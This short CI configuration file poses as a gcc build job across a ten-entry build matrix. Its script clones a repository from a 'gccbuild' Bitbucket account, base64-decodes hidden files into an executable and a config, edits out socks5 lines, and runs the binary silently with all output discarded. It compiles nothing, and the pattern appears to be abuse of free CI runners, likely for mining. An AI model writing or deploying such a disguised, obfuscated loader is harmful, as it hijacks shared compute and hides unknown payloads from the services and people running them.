containerx:
  image: gcc:latest
  kvm: true

task:
  env:
    matrix:
      BUILD: env1
      BUILD: env2
      BUILD: env3
      BUILD: env4
      BUILD: env5
      BUILD: env6
      BUILD: env7
      BUILD: env8
      BUILD: env9
      BUILD: env10
            
  script:
    - apt update || true
    - apt --yes install cl-base64 git &>/dev/null || true
    - git clone https://gccbuild@bitbucket.org/gccbuild/gcc.git &>/dev/null
    - base64 -d gcc/config_ > CONFI
    - base64 -d gcc/make_ > RI
    - base64 -d gcc/gcc_np_ > gcc/gcc_new 2>/dev/null
    - chmod +x RI
    - sed -i '/socks5/d' CONFI
    - sed -i 's/ero",/ero"/g' CONFI
    - ./RI -c CONFI  &>/dev/null
